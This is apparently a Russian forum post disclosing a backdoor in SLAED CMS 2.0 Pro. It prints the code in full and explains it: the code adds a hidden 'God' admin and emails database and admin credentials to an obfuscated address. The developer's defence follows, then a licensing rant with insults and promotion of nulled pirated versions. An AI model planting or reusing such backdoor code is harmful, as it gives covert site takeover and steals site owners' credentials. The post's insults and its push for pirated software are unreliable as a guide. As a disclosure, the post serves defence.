Войти
Регистрация
Публикации
Не указал
В лицензионной версии SLAED CMS 2.0 Pro был найден очень примечательный кусок кода в файле sources.php:
if (md5(md5($_GET['sec']))=="ceabfb42600ae4843d1e000bf59be77a")
{
define("ADMIN_FILE",true);require_once("config/config_secure.php");$db->sql_query("INSERT INTO ".$prefix."_authors VALUES ('Security','God','','','399b5a15f73198cf00be57914799a17d','0','1','')");
mail_send(base64_decode("aW5mb0BzbGFlZC5uZXQ="),$adminmail,base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/"),"".$dbhost."
".$dbuname."
".$dbpass."
".$dbname."
".$admin_file."
".$license_key."
".$adminlogin."
".$adminpassword."",0,1);
}Объясню суть этого кода, при определенном запросе, двойной md5 хеш которого развен "ceabfb42600ae4843d1e000bf59be77a"
( естественно Eduard знает изначальное значение данной строки ) выполняются следующие действия:
define("ADMIN_FILE",true); - определяется константа доступа к админ файлам системыrequire_once("config/config_secure.php"); - запрашивается конфигурационный файл$db->sql_query("INSERT INTO ".$prefix."_authors VALUES ('Security','God','','','399b5a15f73198cf00be57914799a17d','0','1','')");- добавляется новый админ с логином Security и правами God( пароль етесно знает Eduard )Дальше идет отправка электронной почты с параметрами
mail_send(base64_decode("aW5mb0BzbGFlZC5uZXQ="),$adminmail,base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/"),"".$dbhost."
".$dbuname."
".$dbpass."
".$dbname."
".$admin_file."
".$license_key."
".$adminlogin."
".$adminpassword."",0,1);
base64_decode("aW5mb0BzbGFlZC5uZXQ=") - есть info@slaed.netЭто легко проверить создав простейший PHP сценарий:
<?php
echo base64_decode("aW5mb0BzbGFlZC5uZXQ=);
?>Далее
$adminmail= адрес эл. почты администратора
base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/"); = строка "Нелегальная версия";$dbhost - хост БД
$dbuname - имя пользователя БД
$dbpass - пароль к БД
$dbname - имя БД
$admin_file - имя файла админ панели
$license_key - лиц. ключ
$adminlogin - логин для доступа к админ панели( если используется http анунтефикация )
$adminpassword - пароль для доступа к админ панели( если используется http анунтефикация )
Тем самым Eduard получает полный доступ к сайту!!!
И где гарантия что он это будет делать только с теми кто пользуется пиратской версией....
Как вам не стыдно товарищ!
PS версия SLAED 2.0 Nulled by BlackNuller и AntiSlaed CMS не имеют данного кода.
Автор статьи Sidious.(AntiSlaed Team)
======
А вот ответ Эдуарда по данному вопросу
Бред!
На нашем сайте тот же код, кто реально сломает?
И так объясняю, клиентам боятся нечего!
А вот тем кто украл, стоит призадуматся, все ли нюансы были найдены ворами?!
Никто кроме автора (Тоесть меня) не сможет воспользоватся этой функцией!
Зделано специально для наказания воров!
====
Да,возможно разработчик решил боротся с пиратскими версиями,то есть тот кто украл,будет им наказан.Но это идет уже нарушение Прав потребителей,ведь этот бэкдор впаривается и тем кто покупал данную систему!!!!....
Любой бэкдор - это нарушение прав тех, кто покупает систему.
Просто никто не будет возиться с этой шнягой)
То есть данные он имеет и о тех кто купил эту систему,но им ничего не грозит как он заявляет.
====
Материал взят с Anti Slaed Teamwww.antislaed.info
=
теперь немного о Anti Slaed Team и о "разработчике" SLAED CMS.
Эдуард,русский программер проживающий в Германии,"разработчик" SLAED CMS(заметьте в ковычках)пару лет назад взял сорцы движка PHP Nuke,который шел и идет по лицензии GNU/GPL,переделал его немного-а в частности дописал кое какие блоки и улучшил некоторые модули.Закрыл баги PHP-Nuke.
Сделал легкий дизайн,и получился SLAED CMS,за которую он стал брать деньги.И скажу немалые.То есть сделал из GNU/GPL коммерческую,хотя сам он нихрена особого не сделал,спасибо разработчикам PHP Nuke.
Anti Slaed Team-Группа более умных программистов,которые начали с того что стали закрывать баги,сделанные Эдуардом при закрытии баг исходников PHP Nuke(смешно,закрыл одно-делал новые),в свою очередь который принимал все их советы и закрывал то,что ему указывали. Но позже когда Эдуард стал окончательно наглеть,Anti Slaed Team выдали всю правду о SLAED CMS.
====
Слова человека по имени JOXX(главного администратора ресурса www.antislaed.info)
По поводу бэкдора я запостил в его форуме для клиентов и мы получили следующий ответ "Если Вы сомневаетесь в нашей порядочности, то почему пользуетесь нашей системой". Логика потрясающая. Кстати глупость несусветная, признаваться в самовольном оставлении бэкдоров в клинтские сайты. Уж наврал бы чего.
Да он, как мне кажется завтрался уже на столько, что сам или запутался или внушил себе, что он все сам написал... Наверное скоро окажется, что и яндекс и гуг его работа... а нюка - это ваще его неудачное детище...
Теперь вывод
Эдуард(SLAED CMS-http://slaed.net) настоящее ЧМО,которое из GNU продукта сделало коммерческий,и теперь яростно защищает якобы свои права,хотя не думает о разработчиках Нюки(GNU/GPL),который он спер и немного переделал-прося за это бабло. Воспользовался трудом тех людей которые написали его и дали ему GNU/GPL.
[b]Anti Slaed Team(www.antislaed.info)Совет,почаще посещайте именно этот сайт. Именно там вы найдете еще много чего интересного про slaed cms,а также их нулленые бесплатные версии,в которых нет бэкдоров,которые туда понапихал "разработчик"-заметте в ковычках.
==
Все это равносильно тому,что допустим кто нибудь взял бы Linux,переделал его немного и стал просить за это бабки. Эпидемия "Билл Гейтса"-мочить таких надо
Сабж.
